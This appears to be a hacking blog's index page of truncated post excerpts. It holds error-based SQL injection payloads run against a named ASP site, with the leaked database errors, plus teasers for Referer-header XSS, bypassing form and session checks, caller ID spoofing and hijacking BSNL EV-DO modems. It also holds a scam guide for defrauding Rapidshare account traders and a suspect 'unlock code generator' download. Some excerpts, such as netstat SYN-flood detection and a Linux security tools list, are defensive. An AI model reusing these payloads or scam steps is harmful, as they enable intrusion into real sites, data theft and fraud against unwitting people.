another way for create xss
similar to the XAS (exploiting header request)

Well we will discuss about that here now ..
http://www.cnil.fr/index.php?id=123
GET /index.php?id=123 HTTP/1.1
Host: www.cnil.fr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://www.google.com/search?q=http%3A%2F%2Fwww.cnil.fr%2Findex.php%3Fid%3D123&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a
Cookie: fe_typo_user=621d0722b0; TestCookieAlone=ok
the referer is used by much webmaster for tracking visitor
it is for that which solutions exists for not the webmaster knows from which site you come
example: http://anonym.to/en.html
We just change the referer by a ‘malicious’ code
because much webmaster dont know or forget this vulnerability
download the firefox plugin: RefControl
available here:
http://www.stardrifter.org/refcontrol/

install it, …

This tutorial is an overview of how javascript can be used to bypass simple/advanced html forms and how it can be used to override cookie/session authentication.
SIMPLE HTML FORMS
1. Bypassing Required Fields
Surely you have met a webpage that requires you to fill all fields in a form in order to submit it. It is possible to bypass these types of restrictions on any webpage. If you take a look at the webpage’s source and follow it down to the form’s code, you will notice the onsubmit form attribute. Hopefully by this …

Because a null-route to an ip is not a solution, it is a kludge.
1) it is based on real attacks.
2) there is not anything of theory, single part practice.
A—>Detecting the attack
1) using the command netstat
netstat -an | grep :80 | sort
netstat -n -p | grep SYN_REC | awk ‘{print $5}’ | awk -F: ‘{print $1}’
netstat -n -p|grep SYN_REC | wc -l
netstat -lpn|grep :80 |awk ‘{print $5}’|sort
netstat -an | grep :80 | awk ‘{ print $5 }’ | awk -F: ‘{ print $1 }’ | sort | uniq -c | sort …

Today , i will write a little tutorial for you:
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14′
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ”.
/ListByCategory.asp, line 25
and 1=convert(int,system_user)-
http://amboi.com/ListByCategory.asp?CatID=111%20and%201=convert(int,system_user)-
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e07′
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value ‘DBAdmin’ to a column of data type int.
/ListByCategory.asp, line 25
and 1=convert(int,(select top 1 table_name from information_schema.tables))-
http://amboi.com/ListByCategory.asp?CatID=111%20and%201=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))-

Microsoft OLE DB Provider for ODBC Drivers error ‘80040e09′
[Microsoft][ODBC SQL Server Driver][SQL Server]SELECT permission denied on object ’sysobjects’, database ‘Auction’, owner ‘dbo’.
/ListByCategory.asp, line 25 …

Important:
When Creating MoneyBookers ID Remember the Birthday they require it when sending money
First Off search for a rapidshare buyer or seller
There search up Rapidshare accounts. You will find 100’s of guys selling and as well as buying. Pick your Victim
Golden Rapidshare Rules:
Quote:
1. If person selling accounts its always money first
2. If person Buying accounts its always Accounts first
1. They Buy converted accounts that is Converted 10ks 20ks
2. Add the dealer in ur Y!M or w/e client you use for chatting
3. Tell him as follows:
Hello I am selling Legal 1 month …

Want to Spoof a identity of caller,we have brought some intresting trick.
Call Forging is the trick by which you can spoof the identity of the
caller and misguide the calle.
By call forging the caller identity is spoofed and can be easily done
by the following way.
This post is written for educational purpose and dont misuse it.
Basics of Call Forging
Firstly the voip is used to call via internet PC to a telephone.
In the Voip there is a loop hole which allow a intruder to spoof
a call.
There are many website on the net …

BSNL EV-DO

BSNL is a Government body that offers Telecommunication and Broadband services in India. It also offers USB Modem for both rental and for owning.
This hack works on almost all the USB Modems ( ZTE EV-DO ) provided by BSNL.
EVDO is a Technology short for “Evolution - Data only” that uses 3G Technology introduced by Qualcomm.
Here i am going to share how to eavesdrop into someones Network who are using BSNL EV-DO, and using this trick you can entirely take control of the box.
This hack works only with Windows based …

Searching for i phone secret codes,
Your search ends here we have brought you the latest codes which work on i phone the codes are
Following are the secret codes for your i phone
Latest Hacks Tried Successfully
1) *3001#12345#* and tap Call. Enter Field Mode.Field mode reveals many
of the inner settings of your iPhone,
specifically up-to-date network and cell information.
2) *#06# Displays your IMEI. No need to tap Call.IMEI is the unique
identifier for your cell phone hardware.
Together with your SIM information it identifies you to the provider
network.
3) *777# and tap Call. Account balance for …

Forgotten your unlock code
Dont worry we have came up with the best solution for You
Just download the Phone Unlock code generator and enter the IMEI number
and the suscriber and your phone number and You will get the Unlock Code of your Mobile.
Nokia ,sony ericsson and many other company Supported
Download now

You can never be too safe these days. Viruses, spyware, rootkits, remote exploits, you just never know what security issue is going to be your downfall. That’s why it is important as a Linux administrator to have an understanding of some of the best Linux security tools available to you. In this article, you will learn about Top Ten Linux security tools, and resources on how to use them to your advantage.

Nmap Security Scanner
Nmap, which stands for “Network Mapper” is a free open source utility that allows you …